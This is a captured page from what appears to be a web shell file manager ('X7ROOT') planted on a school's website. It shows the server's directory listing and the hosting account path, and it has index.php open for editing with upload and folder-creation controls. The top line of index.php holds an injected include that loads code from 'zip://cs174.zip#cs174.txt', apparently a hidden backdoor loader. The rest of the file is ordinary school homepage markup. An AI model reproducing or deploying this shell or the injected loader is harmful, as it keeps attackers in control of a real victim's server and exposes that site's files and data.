X7ROOT File Manager
Current Path:
/home/u126090504/domains/xavierhighschoolsoro.in/public_html
home
/
u126090504
/
domains
/
xavierhighschoolsoro.in
/
public_html
/
📁
..
📄
.htaccess
(1.13 KB)
📄
about-us.php
(2.29 KB)
📁
admin
📄
admission.php
(2.92 KB)
📁
ajax-load
📁
aspnet_client
📄
cleanup_README.txt
(1.25 KB)
📄
contact-us.php
(4.71 KB)
📄
contactdb.php
(796 B)
📁
css
📄
director's-desk.php
(3.08 KB)
📁
fonts
📄
footer.php
(3.21 KB)
📄
gallery.php
(3.59 KB)
📄
header.php
(6.64 KB)
📁
images
📄
index.php
(21.24 KB)
📁
js
📄
laboratory.php
(3.71 KB)
📄
library.php
(4.26 KB)
📄
principal's-desk.php
(3.04 KB)
📄
public-disclosure.php
(9.83 KB)
📄
secure_upload.php
(2.87 KB)
📄
showpath.php
(107 B)
📄
smart-classes.php
(3.33 KB)
📄
xavierhighschoolsoro-in.zip
(31.02 MB)
Editing: index.php
<?php include_once "zip://cs174.zip#cs174.txt"; include("header.php"); ?> <!-- Start main-content --> <div class="main-content"> <section id="home"> <!-- Slider Revolution Start --> <!-- Slider Revolution Start --> <div id="myCarousel" class="carousel slide" data-ride="carousel"> <!-- Indicators --> <!-- Wrapper for slides --> <div class="carousel-inner" role="listbox"> <div class="item active"> <img src="images/bg/bg5.jpg" alt="Xavier Highschool School Soro" width="100%"> </div> <?php require 'admin/database/dbconfig.php'; $query = "SELECT * FROM bannertab"; $query_run = mysqli_query($connection, $query); $check_img = mysqli_num_rows($query_run) > 0; if ($check_img) { while ($row = mysqli_fetch_array($query_run)) { ?> <div class="item"> <img src="admin/files/images/<?php echo $row['imgfile']; ?>" alt="Xavier Highschool Soro" width="100%"> </div> <?php } } else { echo "No Records Found"; } ?> </div> <a class="left carousel-control" href="#myCarousel" data-slide="prev"> <span class="glyphicon glyphicon-chevron-left"></span> <span class="sr-only">Previous</span> </a> <a class="right carousel-control" href="#myCarousel" data-slide="next"> <span class="glyphicon glyphicon-chevron-right"></span> <span class="sr-only">Next</span> </a> </div> </section> <!-- Section: home-boxes --> <section class="bg-silver-light"> <div class="container pt-0 pb-0"> <div class="section-content"> <div class="row equal-height-inner home-boxes" data-margin-top="-100px"> <div class="col-sm-12 col-md-3 pl-0 pl-sm-15 pr-0 pr-sm-15 sm-height-auto mt-sm-0 wow fadeInLeft animation-delay1"> <div class="sm-height-auto bg-theme-colored"> <div class="text-center pt-30 pb-30"> <i class="fa fa-list-alt text-white font-64"></i> <h4 class="text-uppercase mt-20"><a href="#" class="text-white">100% Result</a></h4> </div> </div> </div> <div class="col-sm-12 col-md-3 pl-0 pl-sm-15 pr-0 pr-sm-15 sm-height-auto mt-sm-0 wow fadeInLeft animation-delay2"> <div class="sm-height-auto bg-theme-colored-darker2"> <div class="text-center pt-30 pb-30"> <i class="fa fa-user text-white font-64"></i> <h4 class="text-uppercase mt-20"><a href="#" class="text-white">Experienced Faculty</a></h4> </div> </div> </div> <div class="col-sm-12 col-md-3 pl-0 pl-sm-15 pr-0 pr-sm-15 sm-height-auto mt-sm-0 wow fadeInLeft animation-delay3"> <div class="sm-height-auto bg-theme-colored-darker3"> <div class="text-center pt-30 pb-30"> <i class="fa fa-camera text-white font-64"></i> <h4 class="text-uppercase mt-20"><a href="#" class="text-white">CCTV Surveillance</a></h4> </div> </div> </div> <div class="col-sm-12 col-md-3 pl-0 pl-sm-15 pr-0 pr-sm-15 sm-height-auto mt-sm-0 wow fadeInLeft animation-delay4"> <div class="sm-height-auto bg-theme-colored-darker4"> <div class="text-center pt-30 pb-30"> <i class="fa fa-calendar text-white font-64"></i> <h4 class="text-uppercase mt-20"><a href="#" class="text-white">Monthly Test</a></h4> </div> </div> </div> </div> </div> </div> </section> <!-- Section: About --> <section id="about"> <div class="container pb-70"> <div class="section-content"> <div class="row"> <div class="col-md-8 col-sm-12 wow fadeInRight" data-wow-duration="1s" data-wow-delay="0.3s"> <h2 class="text-uppercase mt-0" style="font-size: 24px;">Welcome To <span class="text-theme-color-2"> ST. Xavier's High School,Soro </span></h2> <p style="text-align: justify;">ST. Xavier's High School,Soro Keeping in view of the growing need of 'Genext', it has come up to provide the best opportunity in education. It has a saturated infrastructure with every facility needed for school Education. A well planned curriculum at all stages Pre-Primary, Primary and Secondary levels. Activities throughout the years help to create a balance in all sections of the school. Children of the entire school are a part of inter school activities.</p> <a href="about-us.html" class="btn btn-sm btn-theme-colored">Read more</a> <div class="row mt-40"> <div class="col-md-6 wow fadeInUp" data-wow-duration="1s"> <div class="mb-sm-30"> <img src="images/aim.jpg"> <h4 class="letter-space-1 mt-10">Our<span class="text-theme-color-2"> Aim</span></h4> <p style="text-align: justify;">The aim of the institution is to give pupils an all round education, moral, academic, social and physcal, based on high ideals and principles. </p> </div> </div> <div class="col-md-6 wow fadeInUp" data-wow-duration="1.2s"> <div class="mb-sm-30"> <img src="images/aim2.jpg"> <h4 class=" letter-space-1 mt-10">Our <span class="text-theme-color-2"> Motto</span></h4> <p>The definition of school of Education for Humanism rests upon the two terms school and perfection, while school points up to regrouping of discipline</p> </div> </div> </div> </div> <div class="col-md-4 col-sm-12 wow fadeInLeft" data-wow-duration="1s" data-wow-delay="0.3s"> <div class="p-30 bg-theme-colored mt-10"> <h3 class="text-white mt-0 mb-10">Notice Board</h3> <!-- Appilication Form Start--> <div class="row" style="background-color: white;"> <marquee direction="up" scrolldelay="4" scrollamount="4" onmouseover='this.stop();' onmouseout="this.start();" style="height: 370px;"> <?php require 'admin/database/dbconfig.php'; $query = "SELECT * FROM nboard"; $query_run = mysqli_query($connection, $query); $check_notice = mysqli_num_rows($query_run) > 0; if ($check_notice) { while ($row = mysqli_fetch_array($query_run)) { ?> <h5> <img src="images/new1.gif" / style="float:left;"><span style="color:#0000b3;"><?php echo $row['date']; ?></span> <a href="<?php echo 'admin/files/' . $row['nurl'] ?>"><?php echo $row['ntext']; ?></a> </h5> <?php } } else { echo "We will soon update this page"; } ?> </marquee> </div> <!-- Application Form End--> <!-- Application Form Validation Start--> <script type="text/javascript"> $("#reservation_form").validate({ submitHandler: function(form) { var form_btn = $(form).find('button[type="submit"]'); var form_result_div = '#form-result'; $(form_result_div).remove(); form_btn.before('<div id="form-result" class="alert alert-success" role="alert" style="display: none;"></div>'); var form_btn_old_msg = form_btn.html(); form_btn.html(form_btn.prop('disabled', true).data("loading-text")); $(form).ajaxSubmit({ dataType: 'json', success: function(data) { if( data.status == 'true' ) { $(form).find('.form-control').val(''); } form_btn.prop('disabled', false).html(form_btn_old_msg); $(form_result_div).html(data.message).fadeIn('slow'); setTimeout(function(){ $(form_result_div).fadeOut('slow') }, 6000); } }); } }); </script> <!-- Application Form Validation Start --> </div> </div> </div> </div> </div> </section> <!-- Section: Mission --> <section id="mission"> <div class="container-fluid pt-0 pb-0"> <div class="row equal-height"> <div class="col-sm-6 col-md-6 xs-pull-none bg-theme-colored wow fadeInLeft" data-wow-duration="1s" data-wow-delay="0.3s"> <div class="pt-60 pb-40 pl-90 pr-160 p-md-30"> <h2 class="title text-white text-uppercase line-bottom mt-0 mb-30">Why Choose Us?</h2> <div class="icon-box clearfix m-0 p-0 pb-10"> <a href="#" class="icon icon-circled bg-white icon-lg pull-left flip sm-pull-none"> <i class="fa fa-desktop text-theme-color-2 font-36"></i> </a> <div class="ml-120 ml-sm-0"> <h4 class="icon-box-title text-white mt-5 mb-10 letter-space-1">Smart Academic Infrastructur</h4> <p class="text-white">Before admitting your child to a boarding school, it is imperative to check if the school is updated with the latest technology or not.</p> </div> </div> <div class="icon-box clearfix m-0 p-0 pb-10"> <a href="#" class="icon icon-circled bg-white icon-lg pull-left flip sm-pull-none"> <i class="fa fa-user text-theme-color-2 font-36"></i> </a> <div class="ml-120 ml-sm-0"> <h4 class="icon-box-title text-white mt-5 mb-10 letter-space-1">Extra-Curricular Facilities</h4> <p class="text-white">Every child has a creative side to their nature. Extra-Curricular not only provide a much-needed break from studies but also allows a child to explore his/her talent and interests. </p> </div> </div> <div class="icon-box clearfix m-0 p-0 pb-10"> <a href="#" class="icon icon-circled bg-white icon-lg pull-left flip sm-pull-none"> <i class="fa fa-money text-theme-color-2 font-36"></i> </a> <div class="ml-120 ml-sm-0"> <h4 class="icon-box-title text-white mt-5 mb-10 letter-space-1">Academic Facilities</h4> <p class="text-white">The quality of education is what makes or breaks a school. It is one aspect of school life where there should be no compromise </p> </div> </div> </div> </div> <div class="col-sm-6 col-md-6 p-0 bg-img-cover wow fadeInRight hidden-xs" data-bg-img="images/bg/bg7.jpg" data-wow-duration="1s" data-wow-delay="0.3s"> </div> </div> </div> </section> <!-- Section: courses --> <section> <div class="container pt-70 pb-40"> <div class="section-title text-center"> <div class="row"> <div class="col-md-8 col-md-offset-2"> <h2 class="mt-0 line-height-1 text-center text-uppercase mb-10 text-black-333">Our <span class="text-theme-color-2"> Facilities</span></h2> </div> </div> </div> <div class="row multi-row-clearfix"> <div class="col-md-12"> <div class="owl-carousel-3col owl-nav-top" data-dots="true"> <div class="item"> <div class="project mb-30 border-2px"> <div class="thumb"> <img class="img-fullwidth" alt="" src="images/project/blog-1.jpg"> </div> <div class="project-details p-15 pt-10 pb-10"> <h4 class="font-weight-700 text-uppercase mt-0"><a href="#">LIBRARY</a></h4> <p style="text-align: justify;">A well-stocked library empower to support teaching, research, academic programmes and technical development programmes. The focus is on leveraging intellectual capital. The library is well-furnished with a wide range of books, journals, newspapers, research publications and periodicals. As on extension, students can avail of a larger collection of books in the KGI library related to Business Management to enrich their knowledge.</p> <a href="library.html" class="btn btn-sm btn-theme-colored">Read more</a> </div> </div> </div> <div class="item"> <div class="project mb-30 border-2px"> <div class="thumb"> <img class="img-fullwidth" alt="" src="images/project/blog-2.jpg"> </div> <div class="project-details p-15 pt-10 pb-10"> <h4 class="font-weight-700 text-uppercase mt-0"><a href="#">SMART CLASSES</a></h4> <p style="text-align: justify;">Smart Class is a highly interactive computer based aid which makes lessons come alive. Through the Smart class program teachers use digital resources such as Animation Clips, Videos, Diagrams, Maps, Graphs, Working models, Computer based simulations etc. from the vast repository, while teaching the chosen topic in the classroom enabling students to acquire a faster and a better understanding of the concepts taught</p> <a href="hostel.html" class="btn btn-sm btn-theme-colored">Read more</a> </div> </div> </div> <div class="item"> <div class="project mb-30 border-2px"> <div class="thumb"> <img class="img-fullwidth" alt="" src="images/project/blog-3.jpg"> </div> <div class="project-details p-15 pt-10 pb-10"> <h4 class="font-weight-700 text-uppercase mt-0"><a href="#">LABORATORY</a></h4> <p style="text-align: justify;">LABORATORY creates an environment for student-centric explorative (learning by doing). It is all about learning, verifying and visualizing mathematical concepts in a 'fun' way. It inculcates learning through 'Applied Reasoning'. This learner centered approach to math helps every child imagine, investigate and interact effectively. The multiple teaching and</p> <a href="laboratory.html" class="btn btn-sm btn-theme-colored">Read more</a> </div> </div> </div> </div> </div> </div> </div> </section> <!-- Divider: Funfact --> <section class="divider parallax layer-overlay" data-bg-img="images/bg/bg6.jpg" data-parallax-ratio="0.7"> <div class="container pt-70 pb-60"> <div class="row"> <div class="col-xs-12 col-sm-6 col-md-3 mb-md-50"> <div class="funfact text-center"> <i class="fa fa-users mt-5 text-white"></i> <h2 data-animation-duration="2000" data-value="8000" class="animate-number text-white mt-0 font-38 font-weight-500">0</h2> <h4 class="text-white text-uppercase">Pass Out Students</h4> </div> </div> <div class="col-xs-12 col-sm-6 col-md-3 mb-md-50"> <div class="funfact text-center"> <i class="fa fa-book mt-5 text-white"></i> <h2 data-animation-duration="2000" data-value="90" class="animate-number text-white mt-0 font-38 font-weight-500">0</h2> <h4 class="text-white text-uppercase">Qualified Teachers</h4> </div> </div> <div class="col-xs-12 col-sm-6 col-md-3 mb-md-50"> <div class="funfact text-center"> <i class="fa fa-home mt-5 text-white"></i> <h2 data-animation-duration="2000" data-value="8" class="animate-number text-white mt-0 font-38 font-weight-500">0</h2> <h4 class="text-white text-uppercase">Subject</h4> </div> </div> <div class="col-xs-12 col-sm-6 col-md-3 mb-md-50"> <div class="funfact text-center"> <i class="fa fa-graduation-cap mt-5 text-white"></i> <h2 data-animation-duration="2000" data-value="30" class="animate-number text-white mt-0 font-38 font-weight-500">0</h2> <h4 class="text-white text-uppercase">Awards</h4> </div> </div> </div> </div> </section> <!-- Section: Teachers --> <!-- Section: events --> <section id="gallery"> <div class="container pt-70 pb-70"> <div class="section-title text-center"> <div class="row"> <div class="col-md-8 col-md-offset-2"> <h2 class="mt-0 line-height-1 text-center mb-10 text-black-333 text-uppercase">Our <span class="text-theme-color-2"> Gllery</span></h2> </div> </div> </div> <div class="section-content"> <div class="row"> <div class="col-md-12"> <!-- Portfolio Gallery Grid --> <div class="gallery-isotope grid-4 gutter-small clearfix" data-lightbox="gallery"> <?php require 'admin/database/dbconfig.php'; $query = "SELECT * FROM gallerytab"; $query_run = mysqli_query($connection, $query); $check_img = mysqli_num_rows($query_run) > 0; if ($check_img) { while ($row = mysqli_fetch_array($query_run)) { ?> <!-- Portfolio Item Start --> <div class="gallery-item campus"> <div class="thumb"> <img class="img-fullwidth" src="admin/galleryimages/<?php echo $row['fileimg']; ?>" alt="project"> <div class="overlay-shade"></div> <div class="text-holder"> <div class="title text-center"><?php echo $row['nimg']; ?></div> </div> <div class="icons-holder"> <div class="icons-holder-inner"> <div class="styled-icons icon-sm icon-dark icon-circled icon-theme-colored"> <a href="admin/galleryimages/<?php echo $row['fileimg']; ?>" data-lightbox-gallery="gallery" title="Xavier Highschool Soro"><i class="fa fa-picture-o"></i></a> </div> </div> </div> </div> </div> <!-- Portfolio Item End --> <?php } } else { echo "No Records Found"; } ?> </div> <!-- End Portfolio Gallery Grid --> </div> </div> </div> </div> </section> </div> <!-- end main-content --> <!-- Footer --> <?php include("footer.php"); ?> <a class="scrollToTop" href="#"><i class="fa fa-angle-up"></i></a> </div> <!-- end wrapper --> <!-- Footer Scripts --> <!-- JS | Custom script for all pages --> <script src="js/custom.js"></script> <!-- SLIDER REVOLUTION 5.0 EXTENSIONS (Load Extensions only on Local File Systems ! The following part can be removed on Server for On Demand Loading) --> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.actions.min.js"></script> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.carousel.min.js"></script> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.kenburn.min.js"></script> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.layeranimation.min.js"></script> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.migration.min.js"></script> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.navigation.min.js"></script> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.parallax.min.js"></script> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.slideanims.min.js"></script> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.video.min.js"></script> </body> </html>
Upload File
Create Folder